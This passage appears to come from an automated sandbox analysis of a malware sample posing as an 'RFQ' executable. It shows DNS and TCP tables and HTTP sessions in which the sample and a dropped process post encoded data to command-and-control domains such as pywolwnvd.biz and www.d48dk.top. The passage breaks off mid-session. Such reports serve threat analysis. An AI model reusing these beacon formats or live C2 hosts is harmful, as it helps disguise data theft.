                                                                              Dec 9, 2024 08:33:47.285548925 CET4986580192.168.2.7156.251.17.224
                                                                              Dec 9, 2024 08:33:47.285548925 CET4986580192.168.2.7156.251.17.224
                                                                              Dec 9, 2024 08:33:47.535677910 CET8049865156.251.17.224192.168.2.7
                                                                              Dec 9, 2024 08:33:47.536258936 CET4986580192.168.2.7156.251.17.224
                                                                              Dec 9, 2024 08:33:47.907763004 CET8049865156.251.17.224192.168.2.7
                                                                              Dec 9, 2024 08:33:47.907861948 CET4986580192.168.2.7156.251.17.224
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Dec 9, 2024 08:31:38.396184921 CET5984653192.168.2.71.1.1.1
                                                                              Dec 9, 2024 08:31:38.960129976 CET53598461.1.1.1192.168.2.7
                                                                              Dec 9, 2024 08:31:41.623745918 CET5177253192.168.2.71.1.1.1
                                                                              Dec 9, 2024 08:31:42.000174046 CET6072553192.168.2.71.1.1.1
                                                                              Dec 9, 2024 08:31:42.137850046 CET53607251.1.1.1192.168.2.7
                                                                              Dec 9, 2024 08:31:42.175689936 CET53517721.1.1.1192.168.2.7
                                                                              Dec 9, 2024 08:31:43.790455103 CET5086553192.168.2.71.1.1.1
                                                                              Dec 9, 2024 08:31:43.928740025 CET53508651.1.1.1192.168.2.7
                                                                              Dec 9, 2024 08:32:00.395513058 CET53570191.1.1.1192.168.2.7
                                                                              Dec 9, 2024 08:32:03.739913940 CET53495851.1.1.1192.168.2.7
                                                                              Dec 9, 2024 08:32:03.954391956 CET53636281.1.1.1192.168.2.7
                                                                              Dec 9, 2024 08:32:37.686578035 CET5150553192.168.2.71.1.1.1
                                                                              Dec 9, 2024 08:32:38.341521025 CET53515051.1.1.1192.168.2.7
                                                                              Dec 9, 2024 08:32:54.819766045 CET6099953192.168.2.71.1.1.1
                                                                              Dec 9, 2024 08:32:55.293795109 CET53609991.1.1.1192.168.2.7
                                                                              Dec 9, 2024 08:33:09.960120916 CET6159353192.168.2.71.1.1.1
                                                                              Dec 9, 2024 08:33:10.743262053 CET53615931.1.1.1192.168.2.7
                                                                              Dec 9, 2024 08:33:26.022675991 CET5171153192.168.2.71.1.1.1
                                                                              Dec 9, 2024 08:33:26.510217905 CET53517111.1.1.1192.168.2.7
                                                                              Dec 9, 2024 08:33:41.040391922 CET6292153192.168.2.71.1.1.1
                                                                              Dec 9, 2024 08:33:41.567781925 CET53629211.1.1.1192.168.2.7
                                                                              Dec 9, 2024 08:33:44.570190907 CET5659153192.168.2.71.1.1.1
                                                                              Dec 9, 2024 08:33:45.060858965 CET53565911.1.1.1192.168.2.7
                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Dec 9, 2024 08:31:38.396184921 CET192.168.2.71.1.1.10xd855Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                              Dec 9, 2024 08:31:41.623745918 CET192.168.2.71.1.1.10xe8b3Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                              Dec 9, 2024 08:31:42.000174046 CET192.168.2.71.1.1.10x807Standard query (0)pywolwnvd.bizA (IP address)IN (0x0001)false
                                                                              Dec 9, 2024 08:31:43.790455103 CET192.168.2.71.1.1.10x1ca3Standard query (0)ssbzmoy.bizA (IP address)IN (0x0001)false
                                                                              Dec 9, 2024 08:32:37.686578035 CET192.168.2.71.1.1.10x7651Standard query (0)www.sunnyz.storeA (IP address)IN (0x0001)false
                                                                              Dec 9, 2024 08:32:54.819766045 CET192.168.2.71.1.1.10x36a0Standard query (0)www.d48dk.topA (IP address)IN (0x0001)false
                                                                              Dec 9, 2024 08:33:09.960120916 CET192.168.2.71.1.1.10x3ba2Standard query (0)www.8312zcksnu.bondA (IP address)IN (0x0001)false
                                                                              Dec 9, 2024 08:33:26.022675991 CET192.168.2.71.1.1.10x7c80Standard query (0)www.snyp.shopA (IP address)IN (0x0001)false
                                                                              Dec 9, 2024 08:33:41.040391922 CET192.168.2.71.1.1.10xe915Standard query (0)www.duwixushx.xyzA (IP address)IN (0x0001)false
                                                                              Dec 9, 2024 08:33:44.570190907 CET192.168.2.71.1.1.10x450fStandard query (0)fwiwk.bizA (IP address)IN (0x0001)false
                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Dec 9, 2024 08:31:38.960129976 CET1.1.1.1192.168.2.70xd855No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                              Dec 9, 2024 08:31:42.137850046 CET1.1.1.1192.168.2.70x807No error (0)pywolwnvd.biz54.244.188.177A (IP address)IN (0x0001)false
                                                                              Dec 9, 2024 08:31:42.175689936 CET1.1.1.1192.168.2.70xe8b3No error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                              Dec 9, 2024 08:31:43.928740025 CET1.1.1.1192.168.2.70x1ca3No error (0)ssbzmoy.biz18.141.10.107A (IP address)IN (0x0001)false
                                                                              Dec 9, 2024 08:32:00.395513058 CET1.1.1.1192.168.2.70x6abeName error (3)zlenh.biznonenoneA (IP address)IN (0x0001)false
                                                                              Dec 9, 2024 08:32:03.739913940 CET1.1.1.1192.168.2.70xb770Name error (3)uhxqin.biznonenoneA (IP address)IN (0x0001)false
                                                                              Dec 9, 2024 08:32:03.954391956 CET1.1.1.1192.168.2.70x15ebName error (3)anpmnmxo.biznonenoneA (IP address)IN (0x0001)false
                                                                              Dec 9, 2024 08:32:38.341521025 CET1.1.1.1192.168.2.70x7651No error (0)www.sunnyz.storewebredir.vip.gandi.netCNAME (Canonical name)IN (0x0001)false
                                                                              Dec 9, 2024 08:32:38.341521025 CET1.1.1.1192.168.2.70x7651No error (0)webredir.vip.gandi.net217.70.184.50A (IP address)IN (0x0001)false
                                                                              Dec 9, 2024 08:32:55.293795109 CET1.1.1.1192.168.2.70x36a0No error (0)www.d48dk.topd48dk.topCNAME (Canonical name)IN (0x0001)false
                                                                              Dec 9, 2024 08:32:55.293795109 CET1.1.1.1192.168.2.70x36a0No error (0)d48dk.top154.23.184.207A (IP address)IN (0x0001)false
                                                                              Dec 9, 2024 08:33:10.743262053 CET1.1.1.1192.168.2.70x3ba2No error (0)www.8312zcksnu.bond38.165.29.234A (IP address)IN (0x0001)false
                                                                              Dec 9, 2024 08:33:26.510217905 CET1.1.1.1192.168.2.70x7c80No error (0)www.snyp.shop13.248.169.48A (IP address)IN (0x0001)false
                                                                              Dec 9, 2024 08:33:26.510217905 CET1.1.1.1192.168.2.70x7c80No error (0)www.snyp.shop76.223.54.146A (IP address)IN (0x0001)false
                                                                              Dec 9, 2024 08:33:41.567781925 CET1.1.1.1192.168.2.70xe915No error (0)www.duwixushx.xyz156.251.17.224A (IP address)IN (0x0001)false
                                                                              Dec 9, 2024 08:33:45.060858965 CET1.1.1.1192.168.2.70x450fNo error (0)fwiwk.biz172.234.222.143A (IP address)IN (0x0001)false
                                                                              Dec 9, 2024 08:33:45.060858965 CET1.1.1.1192.168.2.70x450fNo error (0)fwiwk.biz172.234.222.138A (IP address)IN (0x0001)false
                                                                              • pywolwnvd.biz
                                                                              • ssbzmoy.biz
                                                                              • cvgrf.biz
                                                                              • knjghuig.biz
                                                                              • www.sunnyz.store
                                                                              • www.d48dk.top
                                                                              • www.8312zcksnu.bond
                                                                              • www.snyp.shop
                                                                              • www.duwixushx.xyz
                                                                              • vcddkls.biz
                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.74970454.244.188.177805784C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 9, 2024 08:31:40.299113989 CET357OUTPOST /yjbljodlunyh HTTP/1.1
                                                                              Cache-Control: no-cache
                                                                              Connection: Keep-Alive
                                                                              Pragma: no-cache
                                                                              Host: pywolwnvd.biz
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                              Content-Length: 838
                                                                              Dec 9, 2024 08:31:40.299176931 CET838OUTData Raw: 4c 4a f9 a0 81 90 bd d6 3a 03 00 00 93 0a ff 09 ef 33 23 98 58 ee d4 cd e8 f3 e1 e8 fa 86 e3 03 40 c2 c5 22 31 8f a2 df 54 b2 db d7 4b d1 a7 6f d9 d2 18 2c 56 3b 4f 8e 52 47 c4 0a 31 3f a9 e6 32 ee bb 39 ba 68 68 0d 07 da fa dd 56 93 21 55 48 fb
                                                                              Data Ascii: LJ:3#X@"1TKo,V;ORG1?29hhV!UHV,DL&,=o*RR[yvc]^5.H>w@M^)?eVIR=7ou1Lj`.v#{c%u.UM~}GyNqSH
                                                                              Dec 9, 2024 08:31:41.614429951 CET413INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Mon, 09 Dec 2024 07:31:41 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: btst=a0d774400e224fd3512fec35bea2cd08|8.46.123.228|1733729501|1733729501|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                              Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.74970518.141.10.107805784C:\Users\user\Desktop\RFQ _ Virtue 054451000085.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 9, 2024 08:31:42.358186007 CET353OUTPOST /punqdgkybi HTTP/1.1
                                                                              Cache-Control: no-cache
                                                                              Connection: Keep-Alive
                                                                              Pragma: no-cache
                                                                              Host: ssbzmoy.biz
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                              Content-Length: 838
                                                                              Dec 9, 2024 08:31:42.358269930 CET838OUTData Raw: 49 ec a3 0c d3 6b 0b 61 3a 03 00 00 5a de 97 3d 43 ed 13 34 1b d8 87 17 13 49 02 d2 df b7 a5 f4 4d b2 d8 b4 19 e7 88 b6 79 ce 9e 91 13 ce 12 20 6b b6 f3 d2 91 25 16 56 e9 50 c3 9a 13 dd e2 41 fe 09 88 81 4b d0 15 3d b1 d2 e4 ea 7a e5 e7 42 92 8c
                                                                              Data Ascii: Ika:Z=C4IMy k%VPAK=zB;11s<WBeok0w!M],6g/@ROaTLueD9mk'G})RV=bV`rzytnFZTN%k


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.74970654.244.188.17780
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 9, 2024 08:31:42.358412027 CET350OUTPOST /jigtx HTTP/1.1
                                                                              Cache-Control: no-cache
                                                                              Connection: Keep-Alive
                                                                              Pragma: no-cache
                                                                              Host: pywolwnvd.biz
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                              Content-Length: 874
                                                                              Dec 9, 2024 08:31:42.358468056 CET874OUTData Raw: 32 4b c9 22 0c 1c 71 13 5e 03 00 00 fd 69 6a b6 b9 8b d4 40 02 c2 ee c3 4d f1 14 6f c8 34 d3 c6 38 f8 bf 29 a9 27 57 e2 48 5d 54 d5 7a 26 a5 4c 32 e4 34 f6 b4 b2 30 50 e3 c8 7a f5 e0 ef 97 36 3f 0d 05 4b 61 5e 74 ae a5 8c 38 c7 9e 8b 2c 3f 81 17
                                                                              Data Ascii: 2K"q^ij@Mo48)'WH]Tz&L240Pz6?Ka^t8,?|pA_:6.Z A^Pf*L?p8'N3L{U>+)<*2GIDi55(xYDD^{E`FlG*-6w&L|q3Y$S9
                                                                              Dec 9, 2024 08:31:43.700547934 CET413INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Mon, 09 Dec 2024 07:31:43 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: btst=347d19335652ae8fe6635df2cb790427|8.46.123.228|1733729503|1733729503|0|1|0; path=/; domain=.pywolwnvd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                              Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.74970718.141.10.10780
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 9, 2024 08:31:44.739836931 CET344OUTPOST /s HTTP/1.1
                                                                              Cache-Control: no-cache
                                                                              Connection: Keep-Alive
                                                                              Pragma: no-cache
                                                                              Host: ssbzmoy.biz
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                              Content-Length: 874
                                                                              Dec 9, 2024 08:31:44.739856958 CET874OUTData Raw: 2e ec 73 8e 5e f7 bf 9e 5e 03 00 00 da 09 7a 2d c3 78 a7 18 89 97 25 b2 45 0a f2 18 c1 55 ab 2b d4 12 8e eb fd 0a a0 f5 8f 26 f5 6f 92 f0 d0 cb e0 2b 1d 87 d0 05 0b ce b6 30 14 9d 99 57 6e dc 1f c5 85 26 09 5c e9 0a 6a 53 38 97 7d c9 23 62 71 e0
                                                                              Data Ascii: .s^^z-x%EU+&o+0Wn&\jS8}#bqkOcm(bZcl3J!F1a(xZ2gm$-<yp)FROK{M2IB?@+}W-t|L5=*a+_
                                                                              Dec 9, 2024 08:31:46.800705910 CET411INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Mon, 09 Dec 2024 07:31:46 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: btst=054ef3b02390152d3c1504bf226f4e54|8.46.123.228|1733729506|1733729506|0|1|0; path=/; domain=.ssbzmoy.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                              Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              4192.168.2.74970854.244.188.17780
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 9, 2024 08:31:48.420357943 CET346OUTPOST /rtjcy HTTP/1.1
                                                                              Cache-Control: no-cache
                                                                              Connection: Keep-Alive
                                                                              Pragma: no-cache
                                                                              Host: cvgrf.biz
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                              Content-Length: 874
                                                                              Dec 9, 2024 08:31:48.420357943 CET874OUTData Raw: e8 3a 00 ab 29 e2 0a c7 5e 03 00 00 4e 6c 0b ab 0d b0 a1 ff f5 a8 f5 96 79 d6 29 b7 22 df 2f c5 d0 a1 ab 21 09 34 ed ed dd a9 66 fd 6e 7e 6b f9 13 c4 5f b0 89 41 f3 b5 91 35 ab f3 79 61 6a 79 db 2b 33 3b 0e 38 ac a1 71 83 4a db 46 9f 51 8b a5 67
                                                                              Data Ascii: :)^Nly)"/!4fn~k_A5yajy+3;8qJFQgj--cjMTw?V'D8_,/YhZaGJxsyiZ%sWenm\F!>"{[5X=fYi#G3zYcIj"h
                                                                              Dec 9, 2024 08:31:49.770889997 CET409INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Mon, 09 Dec 2024 07:31:49 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: btst=6e118939ea2b157c5c1dac7cc7da8e3c|8.46.123.228|1733729509|1733729509|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                              Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              5192.168.2.74971818.141.10.10780
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 9, 2024 08:32:01.175236940 CET357OUTPOST /rrxdfrjngeyag HTTP/1.1
                                                                              Cache-Control: no-cache
                                                                              Connection: Keep-Alive
                                                                              Pragma: no-cache
                                                                              Host: knjghuig.biz
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                              Content-Length: 874
                                                                              Dec 9, 2024 08:32:01.175236940 CET874OUTData Raw: 81 02 a1 ce d5 05 d7 aa 5e 03 00 00 e3 65 6f 9d 4d da f0 aa 20 4c ef ad 73 dd 0d 88 a8 ef c6 3f 5f b8 94 fe ed ce 07 50 0f 82 f0 8f 10 75 c2 73 b0 b6 12 08 b0 45 c7 cf 15 86 4b 85 08 15 06 53 65 fa 70 5b a1 57 01 9d c4 3e a5 75 ac 7f 32 e8 a0 d8
                                                                              Data Ascii: ^eoM Ls?_PusEKSep[W>u2hGG(^'T# !~rILKvpZ3/Z*WcdJI%iFQ)k/K4X340MEGof0[on6Bhm(3T_kwLr1
                                                                              Dec 9, 2024 08:32:03.207288027 CET412INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Mon, 09 Dec 2024 07:32:02 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Set-Cookie: btst=6d32ccb43aac17edba35bc2bd6ac0ece|8.46.123.228|1733729522|1733729522|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                              Set-Cookie: snkz=8.46.123.228; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              6192.168.2.749722217.70.184.50805576C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 9, 2024 08:32:38.480850935 CET538OUTGET /px6j/?9dfhu=10RxttPPB0&6Pvh8TXP=EbQ3Su7e0DOmvxBvG6i/QTj+RVb7/J5GOcC/Cv2Jtln7033mm9MhH2ssuuKAlvgFQYkR7TQ/BJkPMGurxzrKLb8lxYxVUxpwQ/Of0rti0wTIxJq6JAsDgXxJoFbzTbGnD1j7Uz133QdH HTTP/1.1
                                                                              Host: www.sunnyz.store
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Language: en-US,en;q=0.5
                                                                              Connection: close
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                              Dec 9, 2024 08:32:39.721884012 CET1236INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Mon, 09 Dec 2024 07:32:39 GMT
                                                                              Content-Type: text/html
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Content-Security-Policy: default-src 'self'; script-src 'nonce-8188373b03e546a4b1c3d91b3b4d453f';
                                                                              Vary: Accept-Language
                                                                              Data Raw: 39 31 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 73 65 6c 66 27 3b 20 73 63 72 69 70 74 2d 73 72 63 20 27 6e 6f 6e 63 65 2d 38 31 38 38 33 37 33 62 30 33 65 35 34 36 61 34 62 31 63 33 64 39 31 62 33 62 34 64 34 35 33 66 27 3b 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 [TRUNCATED]
                                                                              Data Ascii: 91c<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'nonce-8188373b03e546a4b1c3d91b3b4d453f';"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>sunnyz.store</title> <link rel="stylesheet" type="text/css" href="main-dbee9253.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Inter/Inter-Regular--latin.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Inter/Inter-SemiBold--latin.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article class
                                                                              Dec 9, 2024 08:32:39.722048044 CET1236INData Raw: 3d 22 50 61 72 6b 69 6e 67 5f 32 30 32 33 2d 63 6f 6e 74 65 6e 74 5f 31 72 41 38 37 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 4f 6c 64 53 74 61 74 69 63 5f 32 30 32 33 2d 74 69 74 6c 65 5f 31 33 63 65 4b 22 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e
                                                                              Data Ascii: ="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https://whois.gandi.net/en/results?search=s
                                                                              Dec 9, 2024 08:32:39.722059965 CET160INData Raw: 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 28 65 29 20 3d 3e 20 7b 0a 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 61 74 6f 62 28 65 2e 74 61 72 67 65 74 2e 64 61 74 61 73 65 74 2e 75 72 6c 29 20 2b 20 27
                                                                              Data Ascii: ner('click', (e) => { window.location.replace(atob(e.target.dataset.url) + 'sunnyz.store'); }); });</script></main></div> </body></html>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              7192.168.2.749735154.23.184.207805576C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 9, 2024 08:32:55.440675974 CET785OUTPOST /9ffw/ HTTP/1.1
                                                                              Host: www.d48dk.top
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Encoding: gzip, deflate
                                                                              Accept-Language: en-US,en;q=0.5
                                                                              Origin: http://www.d48dk.top
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Content-Length: 221
                                                                              Referer: http://www.d48dk.top/9ffw/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                              Data Raw: 36 50 76 68 38 54 58 50 3d 67 43 79 41 61 63 33 46 4d 39 4b 68 5a 4a 63 30 6c 4e 53 4f 49 4c 5a 62 6c 7a 6b 49 2f 57 46 46 33 4d 45 6e 78 63 57 73 49 54 58 61 73 75 68 4a 36 68 4e 4f 57 71 61 36 50 6f 50 49 6d 72 71 49 72 32 70 4d 51 51 74 56 49 43 59 76 30 42 77 38 55 2f 78 68 62 32 6d 49 75 5a 48 73 65 77 6e 75 36 74 6e 31 61 68 69 75 63 52 2b 32 50 51 66 63 4e 69 65 53 2f 31 51 2b 30 75 32 62 38 47 39 6b 6a 43 4b 73 78 33 67 6c 55 77 79 56 50 74 64 6f 54 75 72 62 67 41 56 55 31 58 75 79 38 61 57 34 5a 38 75 6c 77 66 6a 30 4d 4f 5a 48 6a 6e 31 39 35 4c 78 65 68 6c 49 47 63 57 2b 4d 55 4b 37 79 45 70 35 4a 75 41 2b 4a 73 37 4a 78 6a 4a 55 4c 48 51 3d 3d
                                                                              Data Ascii: 6Pvh8TXP=gCyAac3FM9KhZJc0lNSOILZblzkI/WFF3MEnxcWsITXasuhJ6hNOWqa6PoPImrqIr2pMQQtVICYv0Bw8U/xhb2mIuZHsewnu6tn1ahiucR+2PQfcNieS/1Q+0u2b8G9kjCKsx3glUwyVPtdoTurbgAVU1Xuy8aW4Z8ulwfj0MOZHjn195LxehlIGcW+MUK7yEp5JuA+Js7JxjJULHQ==
                                                                              Dec 9, 2024 08:32:56.947251081 CET302INHTTP/1.1 404 Not Found
                                                                              Server: nginx
                                                                              Date: Mon, 09 Dec 2024 07:32:56 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 138
                                                                              Connection: close
                                                                              ETag: "66927002-8a"
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              8192.168.2.749741154.23.184.207805576C:\Program Files (x86)\MTqZidZSThWeViEbBzlzFxggttkwzAABkkaaeaOlIpmJICyKQdzAsfZIhanEWgnrhcdUVAXr\iavbXasnTxCeiF.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 9, 2024 08:32:58.109345913 CET805OUTPOST /9ffw/ HTTP/1.1
                                                                              Host: www.d48dk.top
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Accept-Encoding: gzip, deflate
                                                                              Accept-Language: en-US,en;q=0.5
                                                                              Origin: http://www.d48dk.top
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Connection: close
                                                                              Cache-Control: max-age=0
                                                                              Content-Length: 241
                                                                              Referer: http://www.d48dk.top/9ffw/
                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
